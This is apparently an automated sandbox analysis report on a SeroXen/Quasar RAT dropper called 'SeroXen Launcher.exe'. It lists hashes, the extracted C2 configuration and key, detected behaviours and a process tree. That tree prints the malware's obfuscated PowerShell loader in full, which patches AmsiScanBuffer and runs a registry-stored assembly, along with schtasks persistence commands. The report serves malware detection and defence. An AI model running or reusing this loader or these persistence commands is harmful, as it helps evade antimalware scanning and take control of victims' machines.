Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-05-2024 09:59

General

  • Target

    SeroXen Launcher.exe

  • Size

    787KB

  • MD5

    17db30a8534b23522fd78de47c0dcb0e

  • SHA1

    54090b4efef19f75920d4d4777a540949291915e

  • SHA256

    e5429c4ca6a72ebefb61fd3da470a2f8aea6b82cbbeb495834e3d376ce06f878

  • SHA512

    33b9481f07fe4341f7ad527379570018ff8bf6d8c6a4a5b8cc42b128d7ecbfe16462a8c437d139a37335211d1a0f1b4c0afea216b2a6cfcb7cd30bed76a971de

  • SSDEEP

    12288:OTzmTxA8/CRrETd9n0B0r90X31CW2GvdwaAElhB8X3v/0qjegZD94Vx1WCaTs:UjZ4Z0B2ClyadnB8X3v/0qjeqx2TWCd

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SeroXen

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-saP4G4ZSqv4MBoKbNC

Attributes
  • encryption_key

    VKNoex1bjxGlbI08GaQD

  • install_name

    $sxr-powershell.exe

  • log_directory

    $SXR-KEYLOGS

  • reconnect_delay

    3000

  • startup_key

    $sxr-powershell

  • subdirectory

    $sxr-seroxen2

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 7 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 53 IoCs
  • Modifies registry class 13 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:612
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:336
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{6f71a27f-31ca-4d43-a32b-443c9e247b15}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2084
    • C:\Windows\system32\lsass.exe
      C:\Windows\system32\lsass.exe
      1⤵
        PID:676
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:952
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:516
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:620
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1076
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1088
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                  1⤵
                    PID:1152
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:2660
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:YiCbFoIyvANj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$aHnpsJvpZRNcrB,[Parameter(Position=1)][Type]$ntOmwrntZa)$dFigyeCCctI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+'f'+[Char](108)+'e'+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+'D'+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+''+'e'+'m'+[Char](111)+''+'r'+''+[Char](121)+'M'+'o'+'dul'+'e'+'',$False).DefineType('My'+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+'ga'+[Char](116)+''+'e'+'T'+[Char](121)+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+'s'+''+','+''+[Char](80)+'u'+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+'d'+','+'A'+'n'+[Char](115)+'i'+[Char](67)+'l'+'a'+''+'s'+'s,'+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+'C'+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dFigyeCCctI.DefineConstructor(''+[Char](82)+'TS'+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+''+'N'+''+[Char](97)+''+'m'+''+[Char](101)+''+','+''+'H'+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+'S'+''+'i'+''+[Char](103)+''+','+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$aHnpsJvpZRNcrB).SetImplementationFlags(''+[Char](82)+'unt'+[Char](105)+''+'m'+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');$dFigyeCCctI.DefineMethod('I'+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+',H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+'y'+[Char](83)+''+'i'+'g,'+[Char](78)+'ew'+'S'+''+'l'+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+'V'+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$ntOmwrntZa,$aHnpsJvpZRNcrB).SetImplementationFlags('Runt'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+'M'+'a'+''+'n'+'a'+[Char](103)+''+'e'+''+'d'+'');Write-Output $dFigyeCCctI.CreateType();}$kQjqBowVDfimr=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'st'+[Char](101)+''+'m'+'.'+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+'r'+''+'o'+''+'s'+''+[Char](111)+'f'+'t'+''+'.'+''+[Char](87)+''+'i'+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+'Un'+'s'+''+'a'+'f'+[Char](101)+'N'+[Char](97)+'t'+[Char](105)+''+[Char](118)+'eM'+[Char](101)+''+[Char](116)+''+[Char](104)+''+'o'+''+'d'+''+[Char](115)+'');$bjNSyLDAMFdQIL=$kQjqBowVDfimr.GetMethod('G'+[Char](101)+''+'t'+'P'+'r'+''+[Char](111)+''+[Char](99)+''+'A'+''+'d'+''+'d'+''+'r'+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+','+'S'+'t'+[Char](97)+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$XYgScSXCfHepBbavevX=YiCbFoIyvANj @([String])([IntPtr]);$qcUgtsshTPKoHaHlUMHLaB=YiCbFoIyvANj @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$XOeiVhGGbMh=$kQjqBowVDfimr.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'M'+''+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+'n'+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+'l'+''+'3'+''+'2'+''+'.'+'d'+'l'+''+'l'+'')));$nwIPDzZyXcCUep=$bjNSyLDAMFdQIL.Invoke($Null,@([Object]$XOeiVhGGbMh,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+'d'+''+[Char](76)+''+'i'+''+'b'+''+[Char](114)+''+'a'+'r'+[Char](121)+'A')));$HdqIweXGgLkNIiadM=$bjNSyLDAMFdQIL.Invoke($Null,@([Object]$XOeiVhGGbMh,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+'u'+''+[Char](97)+''+'l'+''+[Char](80)+'ro'+'t'+'ec'+[Char](116)+'')));$GpEjGox=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nwIPDzZyXcCUep,$XYgScSXCfHepBbavevX).Invoke(''+[Char](97)+'ms'+'i'+''+[Char](46)+'dl'+[Char](108)+'');$NafhLCIiPuenaoIrC=$bjNSyLDAMFdQIL.Invoke($Null,@([Object]$GpEjGox,[Object](''+[Char](65)+'m'+'s'+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+'nB'+[Char](117)+'ff'+[Char](101)+''+[Char](114)+'')));$mKTovEvBKo=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HdqIweXGgLkNIiadM,$qcUgtsshTPKoHaHlUMHLaB).Invoke($NafhLCIiPuenaoIrC,[uint32]8,4,[ref]$mKTovEvBKo);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$NafhLCIiPuenaoIrC,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HdqIweXGgLkNIiadM,$qcUgtsshTPKoHaHlUMHLaB).Invoke($NafhLCIiPuenaoIrC,[uint32]8,0x20,[ref]$mKTovEvBKo);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+'F'+'T'+[Char](87)+''+'A'+'R'+'E'+'').GetValue('$'+[Char](55)+''+'7'+''+[Char](115)+''+'t'+''+[Char](97)+''+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:2128
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                      1⤵
                      • Drops file in System32 directory
                      PID:1180
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                      1⤵
                        PID:1232
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                        1⤵
                          PID:1312
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1364
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            1⤵
                              PID:1392
                              • C:\Windows\system32\sihost.exe
                                sihost.exe
                                2⤵
                                  PID:2544
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                1⤵
                                  PID:1472
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                  1⤵
                                    PID:1524
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1540
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1648
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                        1⤵
                                          PID:1696
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                          1⤵
                                            PID:1728
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                            1⤵
                                              PID:1812
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1820
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                1⤵
                                                  PID:1956
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                  1⤵
                                                    PID:2024
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:2044
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                      1⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1764
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:1852
                                                      • C:\Windows\System32\spoolsv.exe
                                                        C:\Windows\System32\spoolsv.exe
                                                        1⤵
                                                          PID:2148
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                          1⤵
                                                            PID:2268
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                            1⤵
                                                              PID:2276
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                              1⤵
                                                                PID:2556
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                1⤵
                                                                  PID:2668
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                  1⤵
                                                                    PID:2752
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                    1⤵
                                                                      PID:2764
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                      1⤵
                                                                      • Drops file in System32 directory
                                                                      PID:2920
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                        PID:2980
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2992
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                          1⤵
                                                                            PID:3016
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                            1⤵
                                                                              PID:3040
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                              1⤵
                                                                                PID:3124
                                                                              • C:\Windows\Explorer.EXE
                                                                                C:\Windows\Explorer.EXE
                                                                                1⤵
                                                                                • Modifies registry class
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                PID:3212
                                                                                • C:\Users\Admin\AppData\Local\Temp\SeroXen Launcher.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\SeroXen Launcher.exe"
                                                                                  2⤵
                                                                                  • Checks computer location settings
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:4064
                                                                                  • C:\Users\Admin\AppData\Local\Temp\SeroR0X.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\SeroR0X.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4224
                                                                                  • C:\Users\Admin\AppData\Local\Temp\Video.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\Video.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:432
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Video.exe" /rl HIGHEST /f
                                                                                      4⤵
                                                                                      • Creates scheduled task(s)
                                                                                      PID:3364
                                                                                    • C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"
                                                                                      4⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:4808
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f
                                                                                        5⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:4296
                                                                                    • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                      4⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:1508
                                                                                    • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                      "SCHTASKS.exe" /create /tn "$77Video.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Video.exe'" /sc onlogon /rl HIGHEST
                                                                                      4⤵
                                                                                      • Creates scheduled task(s)
                                                                                      PID:1612
                                                                              • C:\Windows\system32\wbem\unsecapp.exe
                                                                                C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                1⤵
                                                                                  PID:3276
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                  1⤵
                                                                                    PID:3668
                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                    1⤵
                                                                                      PID:3872
                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                      1⤵
                                                                                      • Modifies registry class
                                                                                      PID:4044
                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                      1⤵
                                                                                        PID:4100
                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                        1⤵
                                                                                          PID:4232
                                                                                        • C:\Windows\system32\SppExtComObj.exe
                                                                                          C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                          1⤵
                                                                                            PID:3792
                                                                                          • C:\Windows\System32\svchost.exe
                                                                                            C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                            1⤵
                                                                                              PID:4872
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                              1⤵
                                                                                                PID:5116
                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                1⤵
                                                                                                  PID:1128
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                  1⤵
                                                                                                    PID:1984
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                    1⤵
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:544
                                                                                                  • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                    "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                    1⤵
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:3324
                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                    1⤵
                                                                                                      PID:1936
                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:4084
                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                        1⤵
                                                                                                        • Modifies registry class
                                                                                                        PID:8
                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                        C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                        1⤵
                                                                                                          PID:3076
                                                                                                        • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                          C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                          1⤵
                                                                                                          • Checks BIOS information in registry
                                                                                                          • Checks SCSI registry key(s)
                                                                                                          • Enumerates system info in registry
                                                                                                          PID:4452
                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:2008
                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                            1⤵
                                                                                                              PID:2064
                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                              1⤵
                                                                                                                PID:3756

                                                                                                              Network

                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                              Replay Monitor

                                                                                                              Loading Replay Monitor...

                                                                                                              Downloads

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\SeroR0X.exe

                                                                                                                Filesize

                                                                                                                1.3MB

                                                                                                                MD5

                                                                                                                925b20e8384c99e1c0d9b17f45058e68

                                                                                                                SHA1

                                                                                                                cc7b20dea8abb7cf76ef7ef7c3d833fbcd35fe41

                                                                                                                SHA256

                                                                                                                57e3bdc89c259aa1ad611158342d81e120f82b71928c3a72a28fe17d27b6b046

                                                                                                                SHA512

                                                                                                                7e0fc69c92a46c9e797ff058214877f49bf1a98d8f9388d55a720c0dbaeefb51596a1a7a4ec562859bd8998de61589944db7653bd73a623311c78569cf2a304b

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Video.exe

                                                                                                                Filesize

                                                                                                                409KB

                                                                                                                MD5

                                                                                                                b44006746a6ab36772f3c462921c90a0

                                                                                                                SHA1

                                                                                                                ac481b9eba11ca87762c2a681732f9be6aadecf4

                                                                                                                SHA256

                                                                                                                63486bb123e8bdea602ae9f5433bd4a34e3e3aa738b134c50a4ae4da87c2c312

                                                                                                                SHA512

                                                                                                                b6b9897274b9da2f80115fd2baada05814c1975aca2ac73bdc1275f0a63787b1d7918b533918c57cf8bfc47597f79dfe973e78a595608a09b8457ea166826e89

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\install.exe

                                                                                                                Filesize

                                                                                                                162KB

                                                                                                                MD5

                                                                                                                152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                                SHA1

                                                                                                                c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                                SHA256

                                                                                                                a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                                SHA512

                                                                                                                2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                              • C:\Windows\Temp\__PSScriptPolicyTest_eb5ybg34.ve2.ps1

                                                                                                                Filesize

                                                                                                                60B

                                                                                                                MD5

                                                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                SHA1

                                                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                SHA256

                                                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                SHA512

                                                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                              • memory/336-110-0x00000210724C0000-0x00000210724EB000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/336-117-0x00007FFECC1F0000-0x00007FFECC200000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/336-116-0x00000210724C0000-0x00000210724EB000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/432-29-0x00000000746DE000-0x00000000746DF000-memory.dmp

                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/432-30-0x00000000000D0000-0x000000000013C000-memory.dmp

                                                                                                                Filesize

                                                                                                                432KB

                                                                                                              • memory/432-36-0x0000000005C60000-0x0000000005C9C000-memory.dmp

                                                                                                                Filesize

                                                                                                                240KB

                                                                                                              • memory/432-31-0x0000000004FD0000-0x0000000005574000-memory.dmp

                                                                                                                Filesize

                                                                                                                5.6MB

                                                                                                              • memory/432-32-0x0000000004A20000-0x0000000004AB2000-memory.dmp

                                                                                                                Filesize

                                                                                                                584KB

                                                                                                              • memory/432-33-0x0000000004AC0000-0x0000000004B26000-memory.dmp

                                                                                                                Filesize

                                                                                                                408KB

                                                                                                              • memory/432-35-0x0000000004F70000-0x0000000004F82000-memory.dmp

                                                                                                                Filesize

                                                                                                                72KB

                                                                                                              • memory/516-121-0x000001B12B740000-0x000001B12B76B000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/612-77-0x00000292B4D80000-0x00000292B4DAB000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/612-75-0x00000292B4D50000-0x00000292B4D75000-memory.dmp

                                                                                                                Filesize

                                                                                                                148KB

                                                                                                              • memory/612-83-0x00000292B4D80000-0x00000292B4DAB000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/612-84-0x00007FFECC1F0000-0x00007FFECC200000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/612-76-0x00000292B4D80000-0x00000292B4DAB000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/676-94-0x000001AD14500000-0x000001AD1452B000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/676-95-0x00007FFECC1F0000-0x00007FFECC200000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/676-88-0x000001AD14500000-0x000001AD1452B000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/952-105-0x000002B7A2530000-0x000002B7A255B000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/952-106-0x00007FFECC1F0000-0x00007FFECC200000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/952-99-0x000002B7A2530000-0x000002B7A255B000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/2084-65-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/2084-70-0x00007FFF0C170000-0x00007FFF0C365000-memory.dmp

                                                                                                                Filesize

                                                                                                                2.0MB

                                                                                                              • memory/2084-62-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/2084-72-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/2084-69-0x0000000140000000-0x0000000140008000-memory.dmp

